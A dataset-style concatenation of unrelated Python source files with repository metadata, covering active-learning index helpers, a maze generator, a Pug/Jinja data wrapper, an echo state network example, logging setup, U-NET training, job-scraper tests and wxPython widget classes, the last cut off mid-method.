unlab.update(select_ind)
lab.difference_update(select_ind)
lab_list, unlab_list = [], []
for i in lab:
lab_list.append(i)
for i in unlab:
unlab_list.append(i)
return lab_list, unlab_list
def update(select_ind, lab, unlab):
lab = IndexCollection(lab)
unlab = IndexCollection(unlab)
lab.update(select_ind)
unlab.difference_update(select_ind)
lab_list, unlab_list = [],[]
for i in lab:
lab_list.append(i)
for i in unlab:
unlab_list.append(i)
return lab_list, unlab_list
def save_state(data, select_ind, current_ac):
quried_label = data.loc[select_ind,['target']]
st = State(select_ind,current_ac,queried_label=quried_label)
return st
def separate(data):
if 'start' or 'end' in data.columns:
data = data.drop(columns=['start', 'end'])
if 'video' in data.columns:
data = data.drop(columns=['video'])
if 'color' in data.columns:
data = data.drop(columns=['color'])
y = labels = data['target']
features = data.drop(columns=['target'])
X = features = StandardScaler().fit_transform(features)
train, test, lab, unlab = split(X, y, test_ratio=0.3, initial_label_rate=0.2, split_count=1, all_class=True,
saving_path='.')
train_list, test_list, lab_list, unlab_list = [] , [] ,[] ,[]
for i in train[0]:
train_list.append(i)
for i in test[0]:
test_list.append(i)
for i in lab[0]:
lab_list.append(i)
for i in unlab[0]:
unlab_list.append(i)
return X[lab_list], y[lab_list] | weiweian1996/VERSION2.0 | GUI/Function/index_handle.py | index_handle.py | py | 1,941 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "alipy.index.IndexCollection",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "alipy.index.IndexCollection",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "alipy.index.IndexCollection",
"line_number": 20,
"usage_type": "call"
},
{
... |
25926762211 | from random import randint
import numpy
def fill_unassigned(row):
'''
>>> a = numpy.array([1, 0, 5, 5, 0, 2])
>>> fill_unassigned(a)
>>> a
array([1, 3, 5, 5, 4, 2])
'''
usednums, c = set(row), 1
for i, x in enumerate(row):
if x != 0:
continue
while c in usednums:
c += 1
row[i] = c
usednums.add(c)
def join_sets(row, a, b):
'''
>>> a = numpy.array([1, 1, 2, 2, 3, 2])
>>> join_sets(a, 1, 2)
>>> a
array([1, 1, 1, 1, 3, 1])
'''
row[numpy.where(row == b)[0]] = a
def make_bottom_walls(row):
sets = {}
for x in row:
sets[x] = sets.get(x, 0) + 1
guarded = {k: randint(0, v - 1) for k, v in sets.items()}
bwalls = numpy.zeros(row.shape, dtype='bool')
for i, x in enumerate(row):
sets[x] -= 1
if guarded[x] == sets[x]:
continue
if randint(0, 1):
bwalls[i] = True
return bwalls
def genmaze_eller(cellcount, heightcount):
# 0 1
# +xxx+xxx+xxx+
# x | | x
# +---+---+---+ 0
# x | | x
# +xxx+xxx+xxx+
all_right_walls = numpy.zeros((cellcount - 1, heightcount), dtype=numpy.bool_)
all_bottom_walls = numpy.zeros((cellcount, heightcount - 1), dtype=numpy.bool_)
row = numpy.arange(1, cellcount + 1, dtype=numpy.int16)
rwalls = numpy.zeros((cellcount - 1,), dtype=numpy.bool_)
rwalls_req = numpy.zeros(rwalls.shape, dtype=numpy.bool_)
for y in range(heightcount):
fill_unassigned(row)
rwalls[:] = False
rwalls_req[:] = False
for x in range(cellcount - 1):
if row[x] == row[x + 1]:
rwalls_req[x] = True
continue
if randint(0, 1):
rwalls[x] = True
else:
join_sets(row, row[x], row[x + 1])
if y == heightcount - 1: # last row condition
break
all_right_walls[:, y] = rwalls_req | rwalls
bwalls = make_bottom_walls(row)
all_bottom_walls[:, y] = bwalls
row[bwalls] = 0
# walls in last row
for x in range(cellcount - 1):
if row[x + 1] != row[x]:
rwalls[x] = False
join_sets(row, row[x], row[x + 1])
all_right_walls[:, heightcount - 1] = rwalls | rwalls_req
return {
'width': cellcount,
'height': heightcount,
'rwalls': all_right_walls,
'bwalls': all_bottom_walls,
}
def debug_draw_maze(maze):
from PIL import Image, ImageDraw
WorldSize.cell = 20
w, h = maze['width'], maze['height']
img = Image.new('RGB', (w * WorldSize.cell, h * WorldSize.cell))
draw = ImageDraw.Draw(img)
draw.rectangle((0, 0, w * WorldSize.cell - 1, h * WorldSize.cell - 1), fill=(0, 0, 0))
for y in range(h):
for x in range(w - 1):
if maze['rwalls'][x, y]:
draw.line((
x * WorldSize.cell + WorldSize.cell, y * WorldSize.cell,
x * WorldSize.cell + WorldSize.cell, y * WorldSize.cell + WorldSize.cell
), fill=(255, 255, 255))
for y in range(h - 1):
for x in range(w):
if maze['bwalls'][x, y]:
draw.line((
x * WorldSize.cell, y * WorldSize.cell + WorldSize.cell,
x * WorldSize.cell + WorldSize.cell, y * WorldSize.cell + WorldSize.cell
), fill=(255, 255, 255))
img.show()
if __name__ == '__main__':
maze = genmaze_eller(30, 30)
debug_draw_maze(maze)
| gitter-badger/tierbots | tierbots/worldgen/maze.py | maze.py | py | 3,577 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "numpy.where",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "random.randint",
"line_number": 36,
"usage_type": "call"
},
{
"api_name": "numpy.zeros",
"line_number": 37,
"usage_type": "call"
},
{
"api_name": "random.randint",
"line_num... |
30515350804 | import typing as _
from pathlib import Path
from jinja2 import Environment, FileSystemLoader
from pypugjs.ext.jinja import PyPugJSExtension
asset_folder = ''
def _get_asset(fname: str) -> Path:
return Path(asset_folder, fname)
def _data_with_namespace(data: 'Data', namespace: _.Dict) -> 'DataWithNS':
return DataWithNS(data.data, namespace)
class Data:
def __init__(self, data: _.Dict | _.List | str):
self.data = data
def __repr__(self) -> str:
return f'Data({self.data!r})'
def __eq__(self, other: 'Data') -> bool:
return self.data == getattr(other, 'data', None)
def __getattr__(self, item: _.Any) -> 'Data':
data = self.data
if isinstance(data, dict):
if item in data:
return Data(data[item])
children = data.get('children', [])
return Data([c[item] for c in children if item in c])
elif isinstance(data, list) and len(data) == 1:
data = data[0]
if item in data:
return Data(data[item])
children = data.get('children', [])
return Data([c[item] for c in children if item in c])
return Data('')
def __getitem__(self, item: str) -> str | list['Data']:
data = self.data
if item == '$':
if isinstance(data, str):
return data
elif isinstance(data, dict):
return '\n'.join(data.get('children', []))
elif isinstance(data, list):
if len(data) == 1 and isinstance(data[0], dict):
return '\n'.join(data[0].get('children', []))
return '\n'.join(data)
elif item.startswith('@'):
att_name = item[1:]
if isinstance(data, list):
if len(data) == 1 and isinstance(data[0], dict):
return data[0].get('attributes', {}).get(att_name, '')
return ''
elif isinstance(data, str):
return ''
return data.get('attributes', {}).get(att_name, '')
elif item == '*':
return [Data(d) for d in data] if isinstance(data, list) else []
class DataWithNS(Data):
def __init__(self, data: dict | list | str, ns: _.Dict):
super(DataWithNS, self).__init__(data)
self.ns = ns
def __getattr__(self, item: str) -> 'Data':
name = item
if '__' in item:
ns, name = item.split('__')
name = '{' + self.ns.get(ns, '') + '}' + name
ret = super(DataWithNS, self).__getattr__(name)
return DataWithNS(ret.data, self.ns)
def __getitem__(self, item: str) -> str | list['Data']:
ret = super(DataWithNS, self).__getitem__(item)
if isinstance(ret, list):
return [DataWithNS(i.data, self.ns) for i in ret]
return ret
def build_environment(*, template_dir: Path, asset_dir: Path) -> Environment:
global asset_folder
asset_folder = asset_dir
return Environment(
extensions=[PyPugJSExtension],
loader=FileSystemLoader(template_dir),
variable_start_string="{%#.-.**",
variable_end_string="**.-.#%}",
)
def build_renderer(jinja_env: Environment) -> _.Callable:
def render(template, **kwargs):
return jinja_env\
.get_template(f'{template}.pug')\
.render(enumerate=enumerate,
asset=_get_asset,
dataNS=_data_with_namespace,
**kwargs)
return render
def build_data(data: _.Dict | _.List | str) -> 'Data':
return Data(data)
| OnoArnaldo/py-report-generator | src/reportgen/utils/pug_to_xml.py | pug_to_xml.py | py | 3,635 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "pathlib.Path",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "pathlib.Path",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "typing.Dict",
"line_number": 13,
"usage_type": "attribute"
},
{
"api_name": "typing.Dict",
"line_num... |
16151353249 | from tqdm import tqdm
import time
import argparse
N = int(1e9)
T = 1e-2
MAX_LEN = 100
def parse_args():
parser = argparse.ArgumentParser(description='i really wanna have a rest.')
parser.add_argument('-n', '--iters', type=int, default=N, help='rest iters.')
parser.add_argument('-f', '--frequency', type=float, default=1/T, help='rest frequency per iter.')
args = parser.parse_args()
return args
def have_a_rest():
args = parse_args()
str_ = ''
for idx in tqdm(range(args.iters)):
str_ = str_ + ' '
if len(str_) > MAX_LEN:
str_ = str_[MAX_LEN:]
str_to_print = str_ + 'kaizhong faker'
if idx % 10 < 5:
print(str_to_print)
else:
print(str_to_print + str_to_print)
time.sleep(1.0 / args.frequency)
if __name__ == '__main__':
have_a_rest()
| I-Doctor/have-a-rest | have-a-rest.py | have-a-rest.py | py | 871 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "argparse.ArgumentParser",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "tqdm.tqdm",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "time.sleep",
"line_number": 34,
"usage_type": "call"
}
] |
844258019 | # coding: utf-8
"""Train an ESN with a recursive least squares filter."""
from __future__ import (
absolute_import,
division,
print_function,
unicode_literals,
)
import logging
import hyperopt
import hyperopt.mongoexp
import numpy as np
from esn import RlsEsn
from esn.activation_functions import lecun
from esn.preprocessing import add_noise
from . import SuperposedSinusoidExample
logger = logging.getLogger(__name__)
class RlsExample(SuperposedSinusoidExample):
def __init__(self):
super(RlsExample, self).__init__()
self.num_training_samples = 10000
self.num_test_samples = 500
self.title = 'Superposed sine; RLS; {} samples'.format(
self.num_training_samples
)
self.hyper_parameters = {
'spectral_radius': 1.11,
'leaking_rate': 0.75,
'forgetting_factor': 0.99998,
'autocorrelation_init': 0.1,
'bias_scale': -0.4,
'signal_scale': 1.2,
'state_noise': 0.004,
'input_noise': 0.007,
}
self.search_space = (
hyperopt.hp.quniform('spectral_radius', 0, 1.5, 0.01),
hyperopt.hp.quniform('leaking_rate', 0, 1, 0.01),
hyperopt.hp.quniform('forgetting_factor', 0.98, 1, 0.0001),
hyperopt.hp.qloguniform('autocorrelation_init', np.log(0.1), np.log(1), 0.0001),
hyperopt.hp.qnormal('bias_scale', 1, 1, 0.1),
hyperopt.hp.qnormal('signal_scale', 1, 1, 0.1),
hyperopt.hp.quniform('state_noise', 1e-10, 1e-2, 1e-10),
hyperopt.hp.quniform('input_noise', 1e-10, 1e-2, 1e-10),
)
def _load_data(self, offset=False):
super(RlsExample, self)._load_data(offset)
# remove every other label
self.training_outputs[1::2] = np.nan
def _train(
self,
spectral_radius,
leaking_rate,
forgetting_factor,
autocorrelation_init,
bias_scale,
signal_scale,
state_noise,
input_noise,
):
self.esn = RlsEsn(
in_size=1,
reservoir_size=1000,
out_size=1,
spectral_radius=spectral_radius,
leaking_rate=leaking_rate,
forgetting_factor=forgetting_factor,
autocorrelation_init=autocorrelation_init,
state_noise=state_noise,
sparsity=0.95,
initial_transients=300,
squared_network_state=True,
activation_function=lecun,
)
self.esn.W_in *= [bias_scale, signal_scale]
# train
self.esn.fit(
np.array([self.training_inputs[0]]),
np.array([self.training_outputs[0]])
)
for input_date, output_date in zip(
add_noise(self.training_inputs[1:], input_noise),
self.training_outputs[1:]
):
if not np.isnan(output_date.item()):
self.esn.partial_fit(
np.array([input_date]),
np.array([output_date])
)
else:
# drive reservoir
self.esn.predict(input_date)
# test
predicted_outputs = [self.esn.predict(self.test_inputs[0])]
for i in range(len(self.test_inputs)-1):
predicted_outputs.append(self.esn.predict(predicted_outputs[i]))
return np.array(predicted_outputs)
| 0x64746b/python-esn | examples/superposed_sinusoid/rls.py | rls.py | py | 3,499 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "logging.getLogger",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "hyperopt.hp.quniform",
"line_number": 52,
"usage_type": "call"
},
{
"api_name": "hyperopt.hp",
"line_number": 52,
"usage_type": "attribute"
},
{
"api_name": "hyperopt.hp.q... |
27593505084 | import logging
from logging.handlers import TimedRotatingFileHandler
import os
server_logger = logging.getLogger('server')
PATH = os.path.dirname(os.path.abspath(__file__))
PATH = os.path.join(PATH, 'server.log')
formatter = logging.Formatter(
'%(asctime)s %(levelname)-8s %(funcName)s %(message)s',
datefmt='%Y %b %d %H:%M:%S',
)
file_hand = logging.handlers.TimedRotatingFileHandler(
filename=PATH, when='D', interval=1, encoding='utf-8', delay=True,
backupCount=31, atTime=None
)
file_hand.setFormatter(formatter)
file_hand.setLevel(logging.DEBUG)
server_logger.addHandler(file_hand)
server_logger.setLevel(logging.DEBUG)
if __name__ == '__main__':
console = logging.StreamHandler()
console.setLevel(logging.DEBUG)
console.setFormatter(formatter)
server_logger.addHandler(console)
server_logger.info('Тестовый запуск логирования')
| ide007/DB_and_PyQT | Lesson_1/logs/server_log_config.py | server_log_config.py | py | 902 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "logging.getLogger",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "os.path.dirname",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "os.path.abspath",
"li... |
31065262082 | from tensorflow.keras.backend import clear_session
from tensorflow.keras.models import load_model
from tensorflow.keras.callbacks import ModelCheckpoint, Callback as keras_callback
from tensorflow.keras.preprocessing.image import ImageDataGenerator
import numpy as np
from static.models.unet_model import unet
from scipy.io import loadmat
import json
import random
import logging
# This script uses a set of training data assembled into a .mat file consisting of a stack of images
# and a corresponding set of binary masks that label the pixels in the image stacks into two classes.
# The script then initializes a randomized U-NET (using the topology defined in the file model.py).
# It then initiates training using a given batch size and # of epochs, saving the best net at each
# step to the given .hdf5 file path.
#
# Written by Teja Bollu, documented and modified by Brian Kardon
def createDataAugmentationParameters(rotation_range=None, width_shift_range=0.1,
height_shift_range=0.3, zoom_range=0.4, horizontal_flip=True,
vertical_flip=True):
# Create dictionary of data augmentation parameter
return {
"rotation_range":rotation_range,
"width_shift_range":width_shift_range,
"height_shift_range":height_shift_range,
"zoom_range":zoom_range,
"horizontal_flip":horizontal_flip,
"vertical_flip":vertical_flip
}
class PrintLogger:
def __init__(self):
pass
def log(lvl, msg):
print(msg)
def trainNetwork(trained_network_path, training_data_path, start_network_path=None,
augment=True, batch_size=10, epochs=512, image_field_name='imageStack',
mask_field_name='maskStack', data_augmentation_parameters={},
epoch_progress_callback=None, logger=None):
# Actually train the network, saving the best network to a file after each epoch.
# augment = boolean flag indicating whether to randomly augment training data
# batch_size = Size of training batches (size of batches that dataset is divided into for each epoch):
# epochs = Number of training epochs (training runs through whole dataset):
# training_data_path = .mat file containing the training data (image data and corresponding manually created mask target output):
# image_field_name = Field within .mat file that contains the relevant images:
# mask_field_name = Field within .mat file that contains the relevant masks:
# trained_network_path = File path to save trained network to:
# data_augmentation_parameters = to use for data augmentation:
# epoch_progress_callback = a function to call at the end of each epoch,
# which takes a progress argument which will be a dictionary of progress
# indicators
if logger is None:
logger = PrintLogger()
# Reset whatever buffers or saved state exists...not sure exactly what that consists of.
# This may not actually work? Word is you have to restart whole jupyter server to get this to work.
clear_session()
# Convert inter-epoch progress callback to a tf.keras.Callback object
epoch_progress_callback = TrainingProgressCallback(epoch_progress_callback)
# Load training data
print('Loading images and masks...')
data = loadmat(training_data_path)
img = data[image_field_name]
mask = data[mask_field_name]
# Process image and mask data into the proper format
img_shape = img.shape;
num_samples = img_shape[0]
img_size_x = img_shape[1]
img_size_y = img_shape[2]
img = img.reshape(num_samples, img_size_x, img_size_y, 1)
mask = mask.reshape(num_samples, img_size_x, img_size_y, 1)
print("...image and mask data loaded.")
print("Image stack dimensions:", img.shape)
print(" Mask stack dimensions:", mask.shape)
print('start path:', start_network_path)
print('train path:', trained_network_path)
if augment:
imgGen = ImageDataGenerator(**data_augmentation_parameters)
maskGen = ImageDataGenerator(**data_augmentation_parameters)
if start_network_path is None:
# Randomize new network structure using architecture in model.py file
lickbot_net = unet(net_scale = 1)
else:
# Load previously trained network from a file
lickbot_net = load_model(start_network_path)
# Instruct training algorithm to save best network to disk whenever an improved network is found.
model_checkpoint = ModelCheckpoint(str(trained_network_path), monitor='loss', verbose=1, save_best_only=True)
callback_list = [model_checkpoint]
if epoch_progress_callback is not None:
callback_list.append(epoch_progress_callback)
if augment:
print("Using automatically augmented training data.")
# Train network using augmented dataset
seed = random.randint(0, 1000000000)
imgIterator = imgGen.flow(img, seed=seed, shuffle=False, batch_size=batch_size)
maskIterator = maskGen.flow(mask, seed=seed, shuffle=False, batch_size=batch_size)
steps_per_epoch = int(num_samples / batch_size)
lickbot_net.fit(
((imgBatch, maskBatch) for imgBatch, maskBatch in zip(imgIterator, maskIterator)),
steps_per_epoch=steps_per_epoch, # # of batches of generated data per epoch
epochs=epochs,
verbose=1,
callbacks=callback_list
)
else:
lickbot_net.fit(
img,
mask,
epochs=epochs,
verbose=1,
callbacks=callback_list
)
class TrainingProgressCallback(keras_callback):
def __init__(self, progressFunction):
super(TrainingProgressCallback, self).__init__()
self.logs = []
self.progressFunction = progressFunction
def on_epoch_end(self, epoch, logs=None):
# self.logs.append(logs)
# keys = list(logs.keys())
if 'loss' in logs:
loss = logs['loss']
else:
loss = None
if 'acc' in logs:
accuracy = logs['acc']
else:
accuracy = None
exitFlag = self.progressFunction(epoch=epoch, loss=loss, accuracy=accuracy)
if exitFlag:
self.model.stop_training = True
# print("End epoch {} of training; got log keys: {}".format(epoch, keys))
def validateNetwork(trained_network_path, img=None, imgIterator=None, maskIterator=None):
# Load trained network
lickbot_net = load_model(trained_network_path)
if augment:
img_validate = imgIterator.next()
mask_validate = maskIterator.next()
else:
print('Using original dataset for visualization')
img_validate = img
mask_validate = mask
mask_pred = lickbot_net.predict(img_validate)
mask_pred.shape
# %matplotlib inline
from matplotlib import pyplot as plt
from matplotlib import gridspec
numValidation = img_validate.shape[0]
img_shape = img.shape;
num_samples = img_shape[0]
img_size_x = img_shape[1]
img_size_y = img_shape[2]
img_disp = img_validate.reshape(numValidation,img_size_x,img_size_y)
mask_disp = mask_validate.reshape(numValidation,img_size_x,img_size_y)
mask_pred = lickbot_net.predict(img_validate).reshape(numValidation,img_size_x,img_size_y)
scaleFactor = 3
plt.figure(figsize=(scaleFactor*3,scaleFactor*numValidation))
plt.subplots_adjust(wspace=0, hspace=0)
gs = gridspec.GridSpec(nrows=numValidation, ncols=3, width_ratios=[1, 1, 1],
wspace=0.0, hspace=0.0, bottom=0, top=1, left=0, right=1)
for k in range(numValidation):
plt.subplot(gs[k, 0])
plt.imshow(mask_disp[k])
plt.subplot(gs[k, 1])
plt.imshow(mask_pred[k])
plt.subplot(gs[k, 2])
plt.imshow(img_disp[k])
| GoldbergLab/tongueSegmentationServer | NetworkTraining.py | NetworkTraining.py | py | 7,819 | python | en | code | 1 | github-code | 6 | [
{
"api_name": "tensorflow.keras.backend.clear_session",
"line_number": 61,
"usage_type": "call"
},
{
"api_name": "scipy.io.loadmat",
"line_number": 68,
"usage_type": "call"
},
{
"api_name": "tensorflow.keras.preprocessing.image.ImageDataGenerator",
"line_number": 87,
"usa... |
73919945469 | import unittest
from bs4 import BeautifulSoup
from src import get_html_script as ghs
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from sqlalchemy.ext.declarative import declarative_base
from models.models import JobDataModel
from models import domain_db_mappings as dbm
from models.database_models import JobDataDbModel
import models.database_methods as db_ops
from src.email_generator import TextEmailContent, HtmlEmailContent, generate_full_email_content
from src.email_sender import send_email_to_user, get_data_and_send_email
from datetime import date
Base = declarative_base()
class TestScrapeMethods(unittest.TestCase):
def test_successfully_scrapes_site(self):
# Phil comes by, he wants to use this web scraper tool.
# He plans to see if it can find data on mechanics jobs,
# and he wants to move to tampa, so he checks monster.
query = 'mechanic'
location = 'Tampa'
site = 'https://www.monster.com'
#url = 'https://www.monster.com/jobs/search/?q=mechanic&where=Tampa'
results = ghs.scrape_site(site, query, location)
# Phil sees that he was able to get a successful response
self.assertEqual(results.status_code, 200)
# Phil sees that it did in fact search the site he wanted.
self.assertTrue(site in results.url)
# Phil sees that it definitely searched for the type of job he wanted.results
self.assertTrue(query in results.url)
# He also sees that it certainly searched the location he wanted.
self.assertTrue(location in results.url)
def test_successfully_parses_data(self):
# Mary is a bit more discerning than Phil.
# She wants to make sure her data makes sense.
query = 'developer'
location = 'New York'
site = 'monster.com'
location_names = ['New York', 'NY']
results = ghs.scrape_full_page(site, query, location)
# Results are not empty. Mary managed to scrape data from a site!
self.assertTrue(results)
# Mary does not see any html.
results_names = [result.title for result in results]
results_locations = [result.location for result in results]
results_sites = [result.link for result in results]
self.assertFalse(any(
[
bool(BeautifulSoup(results_name, "html.parser").find())
for results_name in results_names
]
))
self.assertFalse(any(
bool(BeautifulSoup(results_location, "html.parser").find())
for results_location in results_locations
))
# Mary sees that she did get radiologist jobs in her results.
self.assertTrue(any([(query in results_name) for results_name in results_names]))
# Mary also sees that she got results in New York.
self.assertTrue(any(
[
[loc in results_location for loc in location_names]
for results_location in results_locations
]
))
# Mary lastly sees that all of the job links are, in fact from monster.
self.assertTrue(all([site in result_site for result_site in results_sites]))
# Amazed at how far technology has come, a satisfied Mary goes to bed.
class EndToEndHtmlScrapeSaveToDbTest(unittest.TestCase):
def setUp(self):
self.engine = create_engine('sqlite:///:memory:')
Session = sessionmaker(bind=self.engine)
self.session = Session()
Base.metadata.create_all(self.engine, tables=[JobDataDbModel.__table__])
def tearDown(self):
Base.metadata.drop_all(self.engine)
def test_scrapes_and_saves_job_data(self):
job_sites = ['monster.com']
location = 'utah'
query = 'hairdresser'
before_data = self.session.query(JobDataDbModel).all()
self.assertFalse(before_data)
ghs.scrape_sites_and_save_jobs(job_sites, query, location, self.session)
after_data = self.session.query(JobDataDbModel).all()
self.assertTrue(after_data)
class StoresDataAndSendsEmailTest(unittest.TestCase):
def setUp(self):
self.engine = create_engine('sqlite:///:memory:')
Session = sessionmaker(bind=self.engine)
self.session = Session()
Base.metadata.create_all(self.engine, tables=[JobDataDbModel.__table__])
def tearDown(self):
Base.metadata.drop_all(self.engine)
def test_emails_saved_job_data(self):
# Larry is lazy. He doesn't want to have to keep checking everything himself, so
# He wants the app to email him only results that haven't already been emailed to him yet.
query = 'hairdresser'
location = 'utah'
site = 'monster.com'
class_data = ghs.scrape_full_page(site, query, location)
# His data is saved to the database. It is the exact same data that he had before.
mapped_data = dbm.map_job_data_models_to_db_models(class_data)
for data_point in mapped_data:
self.session.add(data_point)
self.session.commit()
saved_data = self.session.query(JobDataDbModel).all()
response = get_data_and_send_email(self.session)
# Larry has received the email after a short amount of time has passed.
self.assertDictEqual(response, {})
# All of the items that were sent are now marked as having been sent.
# Because of this, none of them should show if we filter out sent items in the DB.
updated_data = self.session.query(JobDataDbModel).filter(JobDataDbModel.has_been_emailed == False).all()
self.assertTrue(len(updated_data) == 0)
# Satisfied that it works as expected, Larry goes to bed.
if __name__ == '__main__':
unittest.main()
| ctiller15/Board-scrape-tool | tests/functional_tests.py | functional_tests.py | py | 5,831 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "sqlalchemy.ext.declarative.declarative_base",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "unittest.TestCase",
"line_number": 17,
"usage_type": "attribute"
},
{
"api_name": "src.get_html_script.scrape_site",
"line_number": 27,
"usage_type": "ca... |
75316088506 | import re
import wx
from wx import GridSizer
from wx.lib.agw.supertooltip import SuperToolTip
from boaui.units import area, charge, inertia, length, mass, pressure, volume, tnt, density, torque
from .label import SmartLabel
from . import LayoutDimensions, SmartToolTip
from ..units import KEY_IMPERIAL, KEY_METRIC
from ..units.acceleration import AccelerationUnit
from ..units.angle import AngleUnit
from ..units.area_density import AreaDensityUnit
from ..units.area import AreaUnit
from ..units.charge import ChargeUnit
from ..units.density import DensityUnit
from ..units.force import ForceUnit
from ..units.inertia import InertiaUnit
from ..units.length import LengthUnit
from ..units.linear_density import LinearDensityUnit
from ..units.linear_pressure import LinearPressureUnit
from ..units.mass import MassUnit
from ..units.pressure import PressureUnit
from ..units.time import TimeUnit
from ..units.tnt import TntUnit
from ..units.torque import TorqueUnit
from ..units.velocity import VelocityUnit
from ..units.volume import VolumeUnit
__author__ = 'Joeny'
class SmartTextBox(wx.TextCtrl):
"""
Create a smarter text box that could capture keys and process them
to see if the format is correct.
The validation method goes through three process:
1. OnChar(): Capture ony the key character that are necessary.
2. wx.EVT_TEXT: Validate that the input is actually a number.
3. Validate(): Check against the tolerance level.
"""
def __init__(self, parent, key_up=None, message=None, enabled_message='',
disabled_messages=None, disabled_index=None, value=None, enable=None,
helptext=None, required=False,
normal=(255, 255, 255), format_error=(228, 115, 115), range_error=(244, 67, 54),
data=None, *args, **kwargs):
"""
Constructor
:param parent: parent ui
:param key_up: bind key up handler
:param message: add in tooltip message
:param enabled_message: message once the box is enabled
:param disabled_messages: list of array messages
:param disabled_index: index of the which messages to display
:param value: initial value for smart box
:param enable: enable box
:param helptext: add in context help button
:param required: requirement
:param normal: rgb
:param format_error: rgb
:param range_error: rgb
:param data: used to hold any unique data that can be assessed later
:param args:
:param kwargs:
"""
wx.TextCtrl.__init__(self, parent, *args, **kwargs)
if value is not None:
self.Value = str(value)
self.keys = kwargs.get('keys', {})
self.parent = parent
self.data = data
if key_up:
self.Bind(wx.EVT_KEY_UP, key_up, self)
self.tooltip = None
if message:
self.tooltip = wx.ToolTip(message)
self.SetToolTip(self.tooltip)
self.enabled_message = enabled_message
self.disabled_messages = disabled_messages
if disabled_index is None and self.disabled_messages:
self.disabled_index = 0
else:
self.disabled_index = disabled_index
if helptext:
self.SetHelpText(helptext)
self.required = required
self.color_normal = normal
self.color_format_error = format_error
self.color_range_error = range_error
if enable is not None:
self.Enable(enable)
def clear(self):
self.Clear()
@property
def min(self):
"""
Return the minimum value.
:return: minimum value
"""
return self.keys.get('min')
@min.setter
def min(self, value):
"""
Set the minimum value.
:param value:
"""
self.keys['min'] = value
@property
def max(self):
"""
Return the maximum value.
:return: return max value
"""
return self.keys.get('max')
@max.setter
def max(self, value):
"""
Set the maximum value.
:param: value
"""
self.keys['max'] = value
def set_value(self, value, fmt=None):
# type: (object, object) -> object
"""
Set the textbox value
:param value: text
:return:
"""
if value is not None:
if fmt:
self.Value = fmt%(value)
else:
self.Value = str(value)
else:
self.Value = ""
def get_value(self, key=None):
"""
Get the value
:param key:
:return:
"""
val = self.GetValue()
if key is not None:
# When key is strike we capture.
digit = chr(key)
pos = self.GetInsertionPoint()
if pos == len(val):
val += digit
else:
val = val[:pos] + digit + val[pos:]
return val
def Enable(self, *args, **kwargs):
"""
On enable, clean data if needed.
:param args:
:param kwargs:
"""
wx.TextCtrl.Enable(self, *args, **kwargs)
if self.disabled_messages:
if self.Value in self.disabled_messages:
self.Value = self.enabled_message
def Disable(self, *args, **kwargs):
"""
On disable, add message if needed.
:param args:
:param kwargs:
"""
wx.TextCtrl.Disable(self, *args, **kwargs)
if self.disabled_messages:
self.set_disable_message()
def set_normal_color(self):
"""
Set normal color.
"""
self.SetBackgroundColour(self.color_normal)
self.Refresh()
def set_format_error_color(self):
"""
Set format error color.
"""
self.SetBackgroundColour(self.color_format_error)
self.Refresh()
def set_range_error_color(self):
"""
Set range error color.
"""
self.SetBackgroundColour(self.color_range_error)
self.Refresh()
def set_disable_message(self):
"""
Set disable message.
:return:
"""
self.Value = self.disabled_messages[self.disabled_index]
def check_requirement(self):
"""
Check if the textbox has value
:return:
"""
if self.required:
if self.Enabled:
if self.get_value() is None:
# Set error box.
if hasattr(self, 'set_range_error_color'):
self.set_format_error_color()
return False
if hasattr(self, 'set_normal_color'):
self.set_normal_color()
# If not required, than return true.
return True
class SmartComboBox(wx.ComboBox):
"""
Smart ComboBox is used for units conversion.
"""
def __init__(self, parent, data=None, style=wx.CB_READONLY, value='', message=None, unit=None, unit_system=None,
enabled_message='', disabled_messages=None, disabled_index=None, enable=None,
helptext=None, required=False, *args, **kwargs):
"""
Constructor
:param parent: parent panel or frame
:param data: list of values
:param style: combobox style
:param value: display value
:param message: tooltip message
:param unit: Unit object
:param unit_system: 'imperial' or 'metric'
:param enabled_message: enable message
:param disabled_messages: disable message
:param disabled_index:
:param enable: enable combobox
:param helptext: add in context help
:param required:
:param args:
:param kwargs:
:return:
"""
wx.ComboBox.__init__(self, parent, style=style, *args, **kwargs)
self.convert = None
self.unit_system = unit_system
self.unit = unit
if data:
self.AppendItems(data)
if value:
self.Value = value
self.tooltip = None
if message:
self.tooltip = wx.ToolTip(message)
self.SetToolTip(self.tooltip)
self.previous_index = 0
self.enabled_message = enabled_message
self.disabled_messages = disabled_messages
if disabled_index is None and self.disabled_messages:
self.disabled_index = 0
else:
self.disabled_index = disabled_index
if unit:
# If unit is passed in, activate it.
self.activate()
self.current_dropbox_selection = None
self.Bind(wx.EVT_COMBOBOX_DROPDOWN, self.on_dropdown_open, self)
if helptext:
self.SetHelpText(helptext)
self.required = required
if enable is not None:
self.Enable(enable)
def bind_dropdown(self, handle):
"""
Bind dropdown event to handle.
"""
self.Bind(wx.EVT_COMBOBOX, handle)
def Enable(self, *args, **kwargs):
"""
On enable, clean data if needed.
:param args:
:param kwargs:
"""
wx.ComboBox.Enable(self, *args, **kwargs)
if self.disabled_messages:
if self.Value in self.disabled_messages:
for index, label in enumerate(self.Strings):
if label in self.disabled_messages:
self.Delete(index)
self.SetSelection(self.previous_index)
def Disable(self, *args, **kwargs):
"""
On disable, add message if needed.
:param args:
:param kwargs:
"""
wx.ComboBox.Disable(self, *args, **kwargs)
if self.disabled_messages:
self.previous_index = self.GetCurrentSelection()
self.Append(self.disabled_messages[self.disabled_index])
self.SetSelection(self.GetCount() - 1)
def on_dropdown_open(self, event=None):
"""
